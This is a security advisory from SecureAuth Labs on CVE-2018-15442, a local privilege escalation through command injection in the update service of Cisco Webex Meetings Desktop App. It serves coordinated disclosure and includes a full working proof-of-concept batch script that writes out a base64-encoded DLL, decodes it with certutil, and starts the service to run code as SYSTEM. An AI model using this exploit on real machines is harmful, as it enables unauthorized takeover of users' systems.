Cisco WebEx Meetings Privilege Escalation

`SecureAuth - SecureAuth Labs Advisory  
http://www.secureauth.com/  
  
Cisco WebEx Meetings Elevation of Privilege Vulnerability  
  
*1. *Advisory Information**  
  
Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability  
Advisory ID: CORE-2018-0011  
Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability  
Date published: 2018-11-27  
Date of last update: 2018-11-27  
Vendors contacted: Cisco  
Release mode: Coordinated release  
  
*2. *Vulnerability Information**  
  
Class: OS command injection [CWE-78]  
Impact: Code execution  
Remotely Exploitable: No  
Locally Exploitable: Yes  
CVE Name: CVE-2018-15442  
  
*3. *Vulnerability Description**  
  
Cisco's Webex Meetings website states that [1]:  
  
Cisco Webex Meetings: Simply the Best Video Conferencing and Online  
Meetings. With Cisco Webex Meetings, joining is a breeze, audio and  
video are clear, and screen sharing is easier than ever. We help you  
forget about the technology, to focus on what matters.  
  
A vulnerability in the update service of Cisco Webex Meetings Desktop  
App for Windows could allow a local attacker to elevate privileges. This  
vulnerability is related to a previous security issue fixed by Cisco in  
October.  
  
*4. *Vulnerable Packages* *. Cisco Webex Meetings Desktop App releases prior to 33.6.4  
. Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6  
  
*5. *Vendor Information, Solutions and Workarounds**  
  
Cisco released a new fixed version and updated its security notice:  
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection  
  
*6. *Credits**  
  
This vulnerability was discovered and researched by Marcos Accossatto  
from SecureAuth Exploits' Writers Team. The publication of this advisory  
was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.  
  
*7. *Technical Description / Proof of Concept Code**  
  
*7.1. *Privilege Escalation**  
  
[CVE-2018-15442]  
The update service of Cisco Webex Meetings Desktop App for Windows does  
not properly validate user-supplied parameters. An unprivileged local  
attacker could exploit this vulnerability by invoking the update service  
command with a crafted argument. This will allow the attacker to run  
arbitrary commands with SYSTEM user privileges.  
  
The vulnerability can be exploited by copying to an a local attacker  
controller folder, the ptUpdate.exe binary. Also, a malicious dll must  
be placed in the same folder, named wbxtrace.dll. To gain privileges,  
the attacker must start the service with the command line: sc start  
webexservice install software-update 1 "attacker-controlled-path"  
(if the parameter 1 doesn't work, then 2 should be used)  
  
Proof of Concept:  
  
/-----  
REM Contents of PoC.bat  
REM This batch will copy the ptUpdate.exe from the installation folder to the current folder  
REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll  
REM Finally, the webexservice service will be started, with the showed parameters  
REM The result should be a notepad.exe with SYSTEM user privileges  
@echo off  
:CheckOS  
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)  
  
:64BIT  
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" .  
GOTO END  
  
:32BIT  
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" .  
GOTO END  
  
:END  
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACVyJXZ0an7itGp+4rRqfuKLYnpitOp+4pftuiK1Kn7ilJpY2jRqfuKAAAAAAAAAABQRQAATAEEALCa5 > dll.txt  
echo VsAAAAAAAAAAOAADiELAQUMAAIAAAAGAAAAAAAAABAAAAAQAAAAIAAAAAAAEAAQAAAAAgAABAAAAAQAAAAEAAAAAAAAAABQAAAABAAA3GEAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAABgIAAANQAAAAggAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAnQAAAAAQAAAAAgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAJUAAAAAIAAAAAIAAAAGAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAAAQAAAAADAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAwC5yZWxvYwAAGAAAAABAAAA >> dll.txt  
echo AAgAAAAoAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IPErIN9DAF1NGoAakSNRbxQ6DcAAADHRbxEAAAAjUWsUI1FvFBqAGoAagBqAGoAagBoADAAEGoA6AoAAAC4AQAAAMnCDADM/yUAIAAQVYvsi1UIi0UQi00MwekFg/ >> dll.txt  
echo kAdB2JAolCBIlCCIlCDIlCEIlCFIlCGIlCHIPCIEl144NlDB+DfQwAdA6LTQzB6QKJAoPCBEl1+MnCDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOCAAAAAAAAAwIAAAAAAAAAAAAABKIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOCAAAAAAAABPAENyZWF0ZVByb2Nlc3NBAABrZXJuZWwzMi5kbGwAAAAAAAAAAAAAAAAAALCa5VsAAAAAiCAAAAEAAAAAAAAAAAAAAIggAACIIAAAiCAAAHNrZWxldG9uL >> dll.txt  
echo mRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABub3RlcGF >> dll.txt  
echo kLmV4ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAMAAAANTBMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt  
  
certutil -decode dll.txt wbxtrace.dll  
  
SET mypath=%~dp0  
%mypath:~0,-1%  
  
sc start webexservice install software-update 1 %mypath:~0,-1%  
sc start webexservice install software-update 2 %mypath:~0,-1%  
-----/  
  
*8. *Report Timeline* *2018-11-09: SecureAuth sent an initial notification to the Cisco PSIRT  
including a draft advisory.  
2018-11-09: Cisco acknowledged the vulnerability and replied that they  
were working on a fix and they were planning to release it within the  
next two weeks. In addition, Cisco informed that they will update their  
previous security advisory to mention that the original fix was  
incomplete and to refer to the new ones fixes.  
2018-11-09: SecureAuth thanked the quick response.  
2018-11-19: Cisco notified that they will update the advisory on  
Tuesday 27th.  
2018-11-27: Advisory CORE-2018-0011 published.  
  
*9. *References**  
  
[1] https://www.webex.com/products/video-conferencing.html  
  
*10. *About SecureAuth Labs**  
  
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct research in several important areas of  
computer security, including identity-related attacks, system  
vulnerabilities and cyber-attack planning. Research includes problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. We regularly publish security  
advisories, primary research, technical publications, research blogs,  
project information, and shared software tools for public use at  
http://www.secureauth.com.  
  
*11. *About SecureAuth**  
  
SecureAuth is leveraged by leading companies, their employees, their  
customers and their partners to eliminate identity-related breaches.  
As a leader in access management, identity governance, and penetration  
testing, SecureAuth is powering an identity security revolution by  
enabling people and devices to intelligently and adaptively access  
systems and data, while effectively keeping bad actors from doing harm.  
By ensuring the continuous assessment of risk and enablement of trust,  
SecureAuth's highly flexible Identity Security Automation (ISA) platform  
makes it easier for organizations to prevent the misuse of credentials  
and cexponentially reduce the enterprise threat surface. To learn more,  
visit www.secureauth.com, call (949) 777-6959, or email us at  
[email protected]  
  
*12. *Disclaimer**  
  
The contents of this advisory are copyright (c) 2018 bSecureAuth, and  
are licensed under a Creative Commons Attribution Non-Commercial  
Share-Alike 3.0 (United States) License:  
http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
`